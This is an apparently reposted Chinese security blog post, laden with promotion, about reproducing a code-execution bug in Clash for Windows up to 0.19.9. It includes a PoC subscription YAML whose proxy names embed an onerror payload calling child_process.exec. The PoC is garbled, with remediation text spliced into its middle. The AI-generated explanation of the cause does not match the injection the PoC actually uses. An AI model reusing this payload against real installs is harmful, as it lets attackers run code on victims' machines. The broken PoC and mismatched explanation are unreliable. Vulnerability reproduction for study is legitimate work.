秘密教学科学小猫clash的漏洞!

admin 2025年3月5日11:12:30评论23 views字数 1835阅读6分7秒阅读模式

关于无问社区

无问社区-官网:http://www.wwlib.cn

欢迎大家投稿,投稿可获得无问社区AI大模型的使用红包哦!

无问社区:网安文章沉浸式免费看!

无问AI大模型不懂的问题随意问!

全网网安资源智能搜索只等你来!

无问社区微信交流群(推广与广告勿入) 
秘密教学科学小猫clash的漏洞!

0x01 clash小猫

Clash小猫,是我常用的科学上网工具,然后前段时间,在无问社区看见他的rce漏洞的文章,就想着复现一下,用来回忆一下,那段“秘密教学”

秘密教学科学小猫clash的漏洞!

0x02准备clash小猫

在无问社区查询文章,里面有相关的clash小猫的漏洞版本

必须得 clash for windows <=0.19.9

我是通过这个找到的对应版本,相信大家也能找到!

https://doc.loxcloud.com/win-clash.html

好继续

通过无问AI模型,了解到漏洞的原因

秘密教学科学小猫clash的漏洞!
漏洞原理:该漏洞的根本原因是 Clash for Windows 在处理订阅文件中的 rule-providers 路径时存在不安全的设计和实现问题。具体来说:路径覆盖问题:Clash for Windows 允许用户通过订阅链接动态加载配置文件。如果订阅文件中包含恶意构造的 rule-providers 路径,例如指向本地关键配置文件(如 cfw-settings.yaml),则可以覆盖这些文件的内容。代码执行机制:cfw-settings.yaml 文件中支持使用 JavaScript 代码片段来扩展功能。攻击者可以通过覆盖该文件,注入恶意 JavaScript 代码。当 Clash 启动或重新加载配置时,恶意代码会被自动执行。

本地加载复现:

选择Profiles,点击import导入pocyaml文件,再右击选择Proxies即可复现该漏洞。

秘密教学科学小猫clash的漏洞!
秘密教学科学小猫clash的漏洞!

以下是无问AI模型给我写的poc

秘密教学科学小猫clash的漏洞!
另外附上无问社区里文章编写的poc,方便大家查阅
port: 7890socks-port: 7891allow-lan: truemode: Rulelog-level: infoexternal-controller: :9090proxies:- name:a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>type: socks5server: 127.0.0.1port: "17938"skip-cert-verify: true三、修复方案升级最新版本:https://github.com/Fndroid/clash_for_windows_pkg/releases/tag/0.19.10- name: abctype: socks5server: 127.0.0.1port: "8088"skip-cert-verify: trueproxy-groups:-name:<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>typeselectproxies:-a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>

0x03 总结

RCR漏洞的危害还是挺大的

秘密教学科学小猫clash的漏洞!
通过无问AI模型,了解到clash的开发团队,在第二天就进行了修复:
  • 对 rule-providers 路径进行严格校验,防止覆盖关键配置文件。
  • 禁止在 cfw-settings.yaml 中执行未经签名或未授权的 JavaScript 代码。
害,希望clash能继续更新吧,很喜欢小猫的科学上网捏,便宜实惠,跟无问社区一样!
秘密教学科学小猫clash的漏洞!

这只是无问AI的一种使用方式,更多的使用方式,我会持续去探索实践,欢迎大家前来交流!!!

最后,欢迎点赞评论留下自己的看法,会随机抽取五名幸运儿赠送无问社区社区红包!

欢迎大家前来使用无问AI大模型

秘密教学科学小猫clash的漏洞!

每篇文章都是我们用心的结果,欢迎一键三连

秘密教学科学小猫clash的漏洞!

网安圈瓜料总结|无问社区,30多万份网安资料全公开

“挖漏洞换酒钱?通过信息收集挖到企业的严重漏洞全纪录思路分享

向日葵RCEbypass

弱口令?无问社区助你直接爆破!(附下载)

bayload?使用网安大模型,渗透测试如此简单了!

网传护网6个月?无问社区|护网“密器”:reDuh工具利用端口复用(附下载链接)

加入粉丝群可在公众号页面联系我们进群

原文始发于微信公众号(漏洞谷):“秘密教学”科学小猫clash的漏洞!

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月5日11:12:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   秘密教学科学小猫clash的漏洞!https://cn-sec.com/archives/3798072.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息